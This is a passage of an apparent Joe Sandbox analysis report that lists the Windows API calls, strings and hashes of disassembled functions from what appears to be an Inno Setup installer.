                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                                • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BE0,?,?,?,02152BE0), ref: 004782E8
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,02152BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                • API String ID: 2704155762-2318956294
                                                                                • Opcode ID: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                • Instruction ID: d6ca79aa4c48c3adffb9da4b01ee7f27494699adf3768a2d59cb90ace03db172
                                                                                • Opcode Fuzzy Hash: 626e47d356fab76083b756a204e0250164ee9b03011d355f3d3167744cb8654e
                                                                                • Instruction Fuzzy Hash: 5701C4707C0B0466E520316E4D8AFEB554C8B54B69F54813F7E0CEA2C2DDAE8D06016E
                                                                                Function 0045A170 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,0045A2F2,?,00000000,00000000,00000000,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045A236
                                                                                  • Part of subcall function 004543E0: FindClose.KERNEL32(000000FF,004544D6), ref: 004544C5
                                                                                Strings
                                                                                • Failed to delete directory (%d). Will retry later., xrefs: 0045A24F
                                                                                • Failed to strip read-only attribute., xrefs: 0045A204
                                                                                • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 0045A2AB
                                                                                • Deleting directory: %s, xrefs: 0045A1BF
                                                                                • Failed to delete directory (%d)., xrefs: 0045A2CC
                                                                                • Stripped read-only attribute., xrefs: 0045A1F8
                                                                                • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 0045A210
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorFindLast
                                                                                • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                • API String ID: 754982922-1448842058
                                                                                • Opcode ID: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                • Instruction ID: e72d66395cbcced70a1ff0d39e5b36b51bb4b2a363b16cebf3a96f2a9050ba33
                                                                                • Opcode Fuzzy Hash: 3a6653ca049153ac913e3aecd6f83d976b01ed6d176f23095ac7eac981277501
                                                                                • Instruction Fuzzy Hash: 9A41A730A042449ACB00DBA988463AE76A55F4930AF5486BBBC04D7393CB7D8E1D875F
                                                                                Function 00422E60 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCapture.USER32 ref: 00422EB4
                                                                                • GetCapture.USER32 ref: 00422EC3
                                                                                • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                • ReleaseCapture.USER32 ref: 00422ECE
                                                                                • GetActiveWindow.USER32 ref: 00422EDD
                                                                                • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                • GetActiveWindow.USER32 ref: 00422FCF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                • Instruction ID: 0c1e69f79f034fd7694da938dfb4ae80f60ee9794ae3f0b0e2c785ff7ec3c7d8
                                                                                • Opcode Fuzzy Hash: f8c2677d6609ac077b52c6186ee7afb2eac2e0eedff02b6813b422cc668acf14
                                                                                • Instruction Fuzzy Hash: E4413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF500AB392DB78AE40DB5D
                                                                                Function 0042F2A0 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 0042F2CA
                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0042F2E1
                                                                                • GetActiveWindow.USER32 ref: 0042F2EA
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F317
                                                                                • SetActiveWindow.USER32(?,0042F447,00000000,?), ref: 0042F338
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveLong$Message
                                                                                • String ID:
                                                                                • API String ID: 2785966331-0
                                                                                • Opcode ID: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                • Instruction ID: 0493a3c03df3966e51b4b777c60d25e7c68e0b9e8cdf2dbcd65ae894a3a71964
                                                                                • Opcode Fuzzy Hash: 511403c039d27e5fd3d4a37a0efbe646b1f0bba5a7b321b537e6f3b04ffedf77
                                                                                • Instruction Fuzzy Hash: 7631B471A00654AFDB01EFB5DC52E6EBBB8EB09714B91447AF804E3691D738AD10CB58
                                                                                Function 00429490 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000), ref: 0042949A
                                                                                • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                • 73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                • String ID:
                                                                                • API String ID: 361401722-0
                                                                                • Opcode ID: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                • Instruction ID: f9189b99ec718bdc55f682ba078bc6b9c4dab98ca430e676b6dc028aca6f8884
                                                                                • Opcode Fuzzy Hash: ed5406780fbe6b6ddf9677d4a66f370c2a77f814a30f66ac1398573dbf155f17
                                                                                • Instruction Fuzzy Hash: 3301E1917087513BFB11B67A9CC2F6B61C8CB8435CF44043FFA459A3D2D96C9C80866A
                                                                                Function 0041DE34 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • 73E9A570.USER32(00000000,?,00419069,004985AE), ref: 0041DE37
                                                                                • 73EA4620.GDI32(00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE41
                                                                                • 73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004985AE), ref: 0041DE4E
                                                                                • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectStock$A4620A480A570IconLoad
                                                                                • String ID:
                                                                                • API String ID: 2905290459-0
                                                                                • Opcode ID: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                • Instruction ID: 4e0a0a69a1fbcc37fa68332f5170e2556ef2fd96a8c36c1a21edcb526b0e3b4b
                                                                                • Opcode Fuzzy Hash: c7b946ff5d18463f692f08f3109d9fac972284bfbf41894a6d0fe66ccf938658
                                                                                • Instruction Fuzzy Hash: E11100B06457015AE740FF666A92BA63694D724708F00813FF605AF3D2D7792C449B9E
                                                                                Function 004635AC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004636B0
                                                                                • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463745), ref: 004636B6
                                                                                • SetCursor.USER32(?,0046372D,00007F02,00000000,00463745), ref: 00463720
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load
                                                                                • String ID: $ $Internal error: Item already expanding
                                                                                • API String ID: 1675784387-1948079669
                                                                                • Opcode ID: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                • Instruction ID: 5f7148262a90782ca5f39c73a98182432cf514ee5891adbc4e31059349ad3c9c
                                                                                • Opcode Fuzzy Hash: 11d96d50149c7a0783bfaa5a1745a1d7ac95eac117891e2e72ad5ff3e9801c67
                                                                                • Instruction Fuzzy Hash: EEB19270600284DFD710DF29C585B9ABBF1AF04319F14C4AAE8459B792E778EE48CF5A
                                                                                Function 00453D1C Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringWrite
                                                                                • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                • API String ID: 390214022-3304407042
                                                                                • Opcode ID: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                • Instruction ID: f7f3e57e327ad0b7fc32dd9a0c0ef844c3cf52932767352b59a94e8a2e0b7a1e
                                                                                • Opcode Fuzzy Hash: 4808755b3c6221495a972d98e090ec94bd7c13575b017f43438820c08e4f7dc1
                                                                                • Instruction Fuzzy Hash: 0E910534E001099BDB01EFA5D842BDEB7F5EF4874AF50806AE90077292D7786E49CB59
                                                                                Function 00476B6C Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476BC5
                                                                                • 73EA59E0.USER32(00000000,000000FC,00476B20,00000000,00476E04,?,00000000,00476E2E), ref: 00476BEC
                                                                                • GetACP.KERNEL32(00000000,00476E04,?,00000000,00476E2E), ref: 00476C29
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476C6F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ClassInfoMessageSend
                                                                                • String ID: COMBOBOX$Inno Setup: Language
                                                                                • API String ID: 1455646776-4234151509
                                                                                • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                                                • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                                                Function 00408728 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                  • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale$DefaultSystem
                                                                                • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 1044490935-665933166
                                                                                • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                                                • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                                                Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                  • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                  • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                • String ID: ,$?
                                                                                • API String ID: 2359071979-2308483597
                                                                                • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                                                • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                                                Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                • String ID:
                                                                                • API String ID: 1030595962-0
                                                                                • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                                                • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                • 73EA4620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                • 73E98830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                • 73E922A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                • 73E98830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Stretch$E98830$A4620BitsE922Mode
                                                                                • String ID:
                                                                                • API String ID: 4209919087-0
                                                                                • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                Function 00457114 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                                  • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                  • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                  • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                  • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                                                • TranslateMessage.USER32(?), ref: 004571EB
                                                                                • DispatchMessageA.USER32(?), ref: 004571F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
